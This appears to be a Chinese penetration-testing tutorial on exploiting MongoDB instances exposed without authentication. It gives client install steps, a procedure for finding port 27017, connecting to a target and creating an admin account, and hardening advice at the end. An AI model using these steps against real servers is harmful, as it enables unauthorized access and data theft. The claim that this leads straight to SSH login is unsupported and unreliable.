簡(jiǎn)介

MongoDB是一個(gè)基于分布式文件存儲(chǔ)的數(shù)據(jù)庫(kù)，是一個(gè)介于關(guān)系數(shù)據(jù)庫(kù)和非關(guān)系數(shù)據(jù)庫(kù)之間的產(chǎn)品，它的特點(diǎn)是高性能、易部署、易使用，存儲(chǔ)數(shù)據(jù)非常方便，默認(rèn)情況下是沒(méi)有認(rèn)證的這就導(dǎo)致不熟悉它的研發(fā)人員部署后沒(méi)有做訪問(wèn)控制導(dǎo)致可以未授權(quán)登錄。

實(shí)戰(zhàn)

一、環(huán)境安裝

當(dāng)發(fā)現(xiàn)該端口對(duì)外開(kāi)放時(shí)，使用MongoDB的shell工具mongo可以對(duì)未授權(quán)訪問(wèn)漏洞進(jìn)行利用。

可以查看官方安裝方法

https://docs.mongodb.com/manual/tutorial/install-mongodb-on-debian/

這邊已經(jīng)整理出kali中安裝方法，安裝該工具走了不少?gòu)澛?#xff0c;遇到各種環(huán)境問(wèn)題。

1.導(dǎo)入MongoDB公共GPG密鑰：

wget -qO - https://www.mongodb.org/static/pgp/server-5.0.asc | sudo apt-key add -

如果提示錯(cuò)誤運(yùn)行下面命令之后，重新運(yùn)行上面命令

sudo apt-get install gnupg

2.創(chuàng)建一個(gè)列表文件來(lái)配置下載列表和下載源。

echo "deb http://repo.mongodb.org/apt/debian buster/mongodb-org/5.0 main" | sudo tee /etc/apt/sources.list.d/mongodb-org-5.0.list

3.重新加載更新源

sudo apt-get update

4.安裝MongoDB的最新穩(wěn)定版本

sudo apt-get install -y mongodb-org

5.啟動(dòng)進(jìn)程

sudo systemctl start mongod

如果您在啟動(dòng)mongod時(shí)收到類似于以下內(nèi)容的錯(cuò)誤：

Failed to start mongod.service: Unit mongod.service not found.

首先運(yùn)行以下命令：然后再次運(yùn)行上面的開(kāi)始命令，然后再次運(yùn)行上面的開(kāi)始命令。

sudo systemctl daemon-reload

6.配置開(kāi)機(jī)自啟

sudo systemctl enable mongod

二、漏洞利用

1.掃描或者fofa發(fā)現(xiàn)端口或者服務(wù)，默認(rèn)端口27017

2.使用mongo連接數(shù)據(jù)庫(kù)

命令格式：mongo --host 目標(biāo)ip --port 目標(biāo)端口

3.查看用戶、數(shù)據(jù)庫(kù)信息等

4.創(chuàng)建系統(tǒng)用戶管理員創(chuàng)建一個(gè)用戶名為myUserAdmin，密碼為Passw0rd的系統(tǒng)用戶管理員賬號(hào)

#切換到admin庫(kù)：
> use admin
switched to db admin#創(chuàng)建用戶
> db.createUser({user: "myUserAdmin",pwd: "Passw0rd",roles: [ { role: "userAdminAnyDatabase", db: "admin" } ]}
)#創(chuàng)建成功后提示信息：Successfully added user: {"user" : "myUserAdmin","roles" : [{"role" : "userAdminAnyDatabase","db" : "admin"}]
}

5.ssh直接登錄系統(tǒng)，利用完畢。

注：kali默認(rèn)是沒(méi)有安裝mongo數(shù)據(jù)庫(kù)連接工具的，需要自己手動(dòng)安裝。

三、漏洞修復(fù)

3.0之前版本的MongoDB,默認(rèn)監(jiān)聽(tīng)在0.0.0.0，3.0及之后版本默認(rèn)監(jiān)聽(tīng)在127.0.0.1。
3.0之前版本，如未添加用戶管理員賬號(hào)及數(shù)據(jù)庫(kù)賬號(hào)，使用--auth參數(shù)啟動(dòng)時(shí)，在本地通過(guò)127.0.0.1仍可無(wú)需賬號(hào)密碼登陸訪問(wèn)數(shù)據(jù)庫(kù)，遠(yuǎn)程訪問(wèn)則提示需認(rèn)證；
3.0及之后版本，使用--auth參數(shù)啟動(dòng)后，無(wú)賬號(hào)則本地和遠(yuǎn)程均無(wú)任何數(shù)據(jù)庫(kù)訪問(wèn)權(quán)限。

1.如MongoDB只需在本地使用，建議只在本地開(kāi)啟監(jiān)聽(tīng)服務(wù)。
2.如果僅對(duì)內(nèi)網(wǎng)服務(wù)器提供服務(wù)，建議禁止將MongoDB服務(wù)發(fā)布到互聯(lián)網(wǎng)上，并在主機(jī)上通過(guò)防火墻限制訪問(wèn)源IP。
3.啟動(dòng)基于角色的登錄認(rèn)證功能